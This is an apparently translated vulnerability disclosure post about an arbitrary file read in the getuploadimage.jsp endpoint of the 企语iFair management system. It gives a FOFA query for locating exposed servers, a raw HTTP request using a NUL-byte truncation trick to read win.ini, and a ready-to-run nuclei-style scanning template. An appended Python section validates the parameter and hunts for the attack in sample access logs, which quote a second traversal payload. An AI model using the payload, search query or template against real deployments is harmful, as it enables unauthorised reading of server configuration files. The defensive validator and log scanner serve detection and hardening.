Contents
- Disclaimer
- Vulnerability description
- Search syntax
- Vulnerability reproduction
- yaml
- Remediation
Disclaimer
This article is for learning and exchange only. Do not use it for illegal purposes; the user bears sole responsibility, and the author accepts no liability.
Vulnerability description
The getuploadimage.jsp endpoint of the 企语iFair collaborative management system has an arbitrary file read vulnerability that can be used to read system configuration files.
Search syntax
fofa
app="服务社-企语iFair"
Vulnerability reproduction
Payload
GET /oa/common/components/upload/getuploadimage.jsp?imageURL=C:\Windows\win.ini%001.png HTTP/1.1
Host:
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
yaml
id: template-id
info:
  name: Template Name
  author: 'xl'
  severity: info
  description: description
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |+
        GET /oa/common/components/upload/getuploadimage.jsp?imageURL=C:\Windows\win.ini%001.png HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Accept-Language: zh-CN
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate, br
        Connection: keep-alive
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - extensions
      - type: status
        status:
          - 200
Remediation
Update to the latest version.
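The payload above relies on two things: an absolute path in imageURL and a %00 byte that lets the value end in ".png" for a naive extension check while the native file API stops at the NUL and opens win.ini. The following Python is an added example, not code from the original post or from the iFair product (whose getuploadimage.jsp source is not shown here). It demonstrates the check such an endpoint should perform on imageURL before opening a file, and reuses that same check to hunt for the pattern in web-server access logs. The upload directory, the allowed extensions and the log lines are assumptions constructed for the example.

```python
# Added example, not code from the original post or from the iFair product.
# One validator, two uses: (1) the check an image-serving endpoint such as
# getuploadimage.jsp should run on imageURL before opening a file, and
# (2) a retroactive hunt for the same pattern in web-server access logs.
import re
from pathlib import Path
from urllib.parse import urlsplit, parse_qs

ALLOWED_SUFFIXES = {".png", ".jpg", ".jpeg", ".gif"}
# Assumed upload directory; the product's real layout is not known here.
UPLOAD_ROOT = Path.cwd() / "uploads"
VULN_PATH = "/oa/common/components/upload/getuploadimage.jsp"


class InvalidImagePath(ValueError):
    """Raised when imageURL does not name a file inside the upload directory."""


def resolve_image(image_url: str, upload_root: Path = UPLOAD_ROOT) -> Path:
    """Return the on-disk file for imageURL, or raise InvalidImagePath."""
    # A NUL truncates the name in native file APIs, so "win.ini%001.png" can
    # pass a naive ".png" check and still open win.ini. Reject every control
    # character rather than trying to strip it.
    if any(ord(c) < 0x20 for c in image_url):
        raise InvalidImagePath("control character in path")
    # Only relative names are legitimate; drive letters and leading slashes
    # are never produced by the upload component itself.
    if image_url.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", image_url):
        raise InvalidImagePath("absolute path")
    # Check the extension on the full string, not on a truncated copy.
    if Path(image_url).suffix.lower() not in ALLOWED_SUFFIXES:
        raise InvalidImagePath("disallowed extension")
    # Canonicalise (collapses ".." and symlinks) and confirm containment.
    root = upload_root.resolve()
    candidate = (root / image_url.replace("\\", "/")).resolve()
    if candidate != root and root not in candidate.parents:
        raise InvalidImagePath("path escapes upload directory")
    return candidate


def classify(image_url: str, upload_root: Path = UPLOAD_ROOT) -> str:
    """'ok' for an acceptable imageURL, otherwise the rejection reason."""
    try:
        resolve_image(image_url, upload_root)
        return "ok"
    except InvalidImagePath as exc:
        return str(exc)


# Constructed access-log lines in common log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2024:10:00:01 +0800] "GET /oa/common/components/upload/getuploadimage.jsp?imageURL=C:\\Windows\\win.ini%001.png HTTP/1.1" 200 512
10.0.0.6 - - [01/Jul/2024:10:00:02 +0800] "GET /oa/common/components/upload/getuploadimage.jsp?imageURL=2024/logo.png HTTP/1.1" 200 8192
10.0.0.7 - - [01/Jul/2024:10:00:03 +0800] "GET /oa/common/components/upload/getuploadimage.jsp?imageURL=../../WEB-INF/web.xml%00.jpg HTTP/1.1" 200 2048
10.0.0.8 - - [01/Jul/2024:10:00:04 +0800] "GET /oa/index.jsp HTTP/1.1" 200 1024
"""
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_log(text: str) -> list[dict]:
    """Find getuploadimage.jsp requests whose imageURL the validator rejects."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if url.path.lower() != VULN_PATH:
            continue
        # parse_qs percent-decodes, so "%00" becomes a real NUL byte here.
        for value in parse_qs(url.query, keep_blank_values=True).get("imageURL", []):
            verdict = classify(value)
            if verdict != "ok":
                findings.append({"line": lineno, "client": line.split(" ", 1)[0],
                                 "imageURL": value, "reason": verdict})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} from {f['client']}: {f['reason']} ({f['imageURL']!r})")
```

The order of the checks matters: the NUL test runs first so that a truncating byte can never reach the extension or containment logic, and the extension is read from the complete string rather than from whatever a file API would see. When run, lines 1 and 3 of the sample log are reported and the legitimate request on line 2 is not.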